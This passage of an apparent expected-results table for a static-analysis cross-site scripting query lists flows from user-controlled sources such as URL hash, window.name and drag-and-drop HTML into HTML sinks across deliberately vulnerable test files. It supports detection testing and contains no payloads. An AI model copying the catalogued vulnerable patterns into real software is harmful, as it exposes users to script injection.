droppedHtml | Cross-site scripting vulnerability due to $@. | clipboard.ts:71:27:71:62 | e.clipb ... /html') | user-provided value | -| clipboard.ts:99:23:99:26 | html | clipboard.ts:98:22:98:54 | dataTra ... /html') | clipboard.ts:99:23:99:26 | html | Cross-site scripting vulnerability due to $@. | clipboard.ts:98:22:98:54 | dataTra ... /html') | user-provided value | -| custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | custom-element.js:5:26:5:36 | window.name | Cross-site scripting vulnerability due to $@. | custom-element.js:5:26:5:36 | window.name | user-provided value | -| d3.js:11:15:11:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:11:15:11:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:12:20:12:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:12:20:12:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:14:20:14:29 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:14:20:14:29 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| d3.js:21:15:21:24 | getTaint() | d3.js:4:12:4:22 | window.name | d3.js:21:15:21:24 | getTaint() | Cross-site scripting vulnerability due to $@. | d3.js:4:12:4:22 | window.name | user-provided value | -| dates.js:11:31:11:70 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:11:31:11:70 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:12:31:12:73 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:12:31:12:73 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:13:31:13:72 | `Time i ... time)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:13:31:13:72 | `Time i ... time)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:16:31:16:69 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:16:31:16:69 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:18:31:18:66 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:18:31:18:66 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:21:31:21:68 | `Time i ... aint)}` | dates.js:9:36:9:55 | window.location.hash | dates.js:21:31:21:68 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:9:36:9:55 | window.location.hash | user-provided value | -| dates.js:37:31:37:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:37:31:37:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:38:31:38:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:38:31:38:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:39:31:39:86 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:39:31:39:86 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:40:31:40:84 | `Time i ... aint)}` | dates.js:30:36:30:55 | window.location.hash | dates.js:40:31:40:84 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:30:36:30:55 | window.location.hash | user-provided value | -| dates.js:48:31:48:90 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:48:31:48:90 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:49:31:49:89 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:49:31:49:89 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:50:31:50:104 | `Time i ... aint)}` | dates.js:46:36:46:55 | window.location.hash | dates.js:50:31:50:104 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:46:36:46:55 | window.location.hash | user-provided value | -| dates.js:57:31:57:101 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:57:31:57:101 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:59:31:59:87 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:59:31:59:87 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dates.js:61:31:61:88 | `Time i ... aint)}` | dates.js:54:36:54:55 | window.location.hash | dates.js:61:31:61:88 | `Time i ... aint)}` | Cross-site scripting vulnerability due to $@. | dates.js:54:36:54:55 | window.location.hash | user-provided value | -| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | -| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | -| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | -| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | -| event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | -| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | -| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | -| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | -| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | -| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | -| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | -| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | -| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:26:10:26:22 | context.query | user-provided value | -| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | -| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | -| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | -| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | -| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:23:43:23:54 | router.query | user-provided value | -| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | -| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | -| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | -| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | -| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | -| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | -| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | -| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | -| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | -| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | -| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | -| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... .search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | 